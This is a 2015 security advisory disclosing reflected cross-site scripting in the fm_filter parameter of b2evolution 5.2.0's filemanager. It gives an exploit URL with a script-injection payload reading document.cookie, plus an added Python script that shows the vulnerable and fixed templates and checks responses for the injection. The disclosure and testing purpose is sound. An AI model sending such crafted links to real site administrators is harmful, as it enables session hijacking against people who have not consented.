CMS b2evolution version 5.2.0 suffers from a reflected cross-site scripting vulnerability.
Advisory: Reflected XSS vulnerability in the CMS filemanager of b2evolution v. 5.2.0
Advisory ID: SROEADV-2014-09
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: https://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -
==========================
Vulnerability Description:
==========================
The filemanager of b2evolution v. 5.2.0 is vulnerable to reflected XSS attacks.
==================
Technical Details:
==================
The "fm_filter" parameter of the URL where the filemanager functionality of
b2evolution is located is reflected into the response without proper encoding.
By appending arbitrary HTML and/or JavaScript code to this parameter, an attacker
could trick an authenticated administrative user into executing the code in the
context of the admin session (for example, by sending the user a crafted link).
The filemanager is located here on a common b2evolution installation:
https://{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=
Exploit example:
https://{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=
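The following Python script is an added example and is not code from the advisory or from the b2evolution project. It models the pattern described above: the payload starts with `">` so that, when the filter value is echoed back into an attribute without encoding, it closes the attribute and the surrounding tag and the `<script>` element becomes real markup. The two render functions are assumed stand-ins for the filemanager's real template (which the advisory does not quote); the second one shows the fix (HTML-encoding with quotes escaped). `build_url()` reproduces the exploit URL's encoding, and `reflects_script()` is a small check a tester can run over a captured response body to tell a real script tag from an encoded one.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode

# Payload taken from the advisory's exploit example (decoded form).
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_vulnerable(fm_filter: str) -> str:
    """Assumed stand-in for the filemanager's filter box: the raw value of
    "fm_filter" is interpolated straight into a value attribute."""
    return '<input type="text" name="fm_filter" value="%s">' % fm_filter


def render_fixed(fm_filter: str) -> str:
    """Same template with output encoding; quote=True also escapes the
    double quote, so the value can no longer close the attribute."""
    return '<input type="text" name="fm_filter" value="%s">' % escape(
        fm_filter, quote=True
    )


def build_url(target: str, fm_filter: str) -> str:
    """Build the filemanager URL with the payload URL-encoded as in the
    advisory (only the parameters that matter for the request are kept)."""
    params = {
        "fm_filter": fm_filter,
        "actionArray[filter]": "Apply",
        "ctrl": "files",
        "blog": "1",
        "root": "collection_1",
    }
    return "https://%s/blogs/admin.php?%s" % (target, urlencode(params))


class _TagCollector(HTMLParser):
    """Records every start tag the browser-side parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def reflects_script(body: str) -> bool:
    """True when the response body contains a genuine <script> start tag,
    i.e. the reflected value broke out of its attribute. An encoded
    reflection (&lt;script&gt;) stays inside the attribute and is not
    reported, so this distinguishes "reflected" from "exploitable"."""
    parser = _TagCollector()
    parser.feed(body)
    return "script" in parser.tags


if __name__ == "__main__":
    print(build_url("example.test", PAYLOAD))
    print("vulnerable template:", reflects_script(render_vulnerable(PAYLOAD)))
    print("fixed template:     ", reflects_script(render_fixed(PAYLOAD)))
```

Because the attack is reflected, the request must be made by (or on behalf of) a logged-in administrator; the script only shows how the reflection is checked and encoded, not how the victim is lured.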
=========
Solution:
=========
The vendor did not respond and has provided no fix.
====================
Disclosure Timeline:
====================
30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://b2evolution.net/
[2] https://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3] https://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html